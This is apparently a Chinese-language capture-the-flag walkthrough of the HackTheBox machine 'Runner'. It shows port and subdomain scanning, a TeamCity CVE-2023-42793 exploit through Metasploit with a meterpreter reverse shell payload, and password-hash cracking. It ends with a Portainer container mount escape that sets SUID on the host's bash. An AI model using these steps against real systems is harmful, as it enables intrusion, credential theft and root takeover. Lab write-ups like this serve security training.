基本信息

端口扫描

22,80,8000:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ nmap -sC -sV 10.10.11.13
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-22 13:47 CST
Nmap scan report for 10.10.11.13
Host is up (0.090s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http        nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://runner.htb/
8000/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.98 seconds

80

需要加hosts:

1
10.10.11.13 runner.htb

CI/CD相关服务:

8000

直接访问是404:

子域名扫描

子域名可以发现teamcity,字典需要比较大的,常规的top5000里没有:

1
2
3
4
ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -u "http://runner.htb/" -H 'Host: FUZZ.runner.htb' -fs 154

[Status: 401, Size: 66, Words: 8, Lines: 2, Duration: 95ms]
    * FUZZ: teamcity

teamcity

添加hosts后访问,teamcity Version 2023.05.3 (build 129390):

teamcity

根据版本信息可以搜到已知漏洞:

msf中也有模块:

1
2
3
4
msf6 > use exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > set target 1
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
# 设置其他参数

打到容器内tcuser用户:

data

teamcity data目录一点点翻,可以找到一个ssh私钥:

1
/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys

另外buildserver.data中可以得到Matthew和John

1
2
3
4
/data/teamcity_server/datadir/system/buildserver.data

$2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye John john@runner.htb
$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em Matthew matthew@runner.htb

可以破解出Matthew的密码:

1
2
3
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

piper123

log

另外当前shell history中留下的几条命令提示查看log:

日志中也可以得到john:

1
2
3
cat teamcity-server.log| grep "@runner.htb"

john@runner.htb

预期方法

通过shell去打的方法实际上比较麻烦,预期方法添加管理员登录上去可以看到一个项目,然后里面获取这些信息

user flag

得到的Matthew的密码不能用于ssh登录,但john可以使用前面得到的私钥登录:

1
ssh -i john_id_rsa john@10.10.11.13

信息

本地有9000和9443端口,转发出来访问,是portainer:

1
ssh -i john_id_rsa john@10.10.11.13 -L 9000:127.0.0.1:9000

Matthew的账号密码可以登录portainer:

提权 & root flag

现在我们登录到了在线容器管理平台,后面就是常规的挂载逃逸:

首先创建一个volume,添加一些选项:

然后创建一个容器,使用这个volume,image使用teamcity:latest即可, 高级选项中启用Interactive & tty:

然后volumes里选择我们前面创建的那个,设置container目录:

然后用容器内root执行命令,查看挂载目录:

root直接给宿主机bash加suid,方便从前面的john shell操作:

1
root@e8b5e4abf35d:/# chmod +s /mnt/root/bin/bash

root flag

shadow

1
2
3
root:$y$j9T$ANKO0Lgp1HOfm5nPIRoTX.$S4tkxOzaYLCUAy8deQR/4sayinxeXoQb.nGRDMGUa30:19788:0:99999:7:::
matthew:$y$j9T$VcVx4oj6/0sr8ldYLVrdx1$xNznv.vvbyLEM8S6/YKAfPHP6hoYg3oD1MWRNovVlx/:19781:0:99999:7:::
john:$y$j9T$rpK6N7DunMYlKLZJcOzCY1$lcPx9lbvGZBnn7ip/qQDho2NCF/UsOmYc1P2Ve/y6F2:19781:0:99999:7:::

参考资料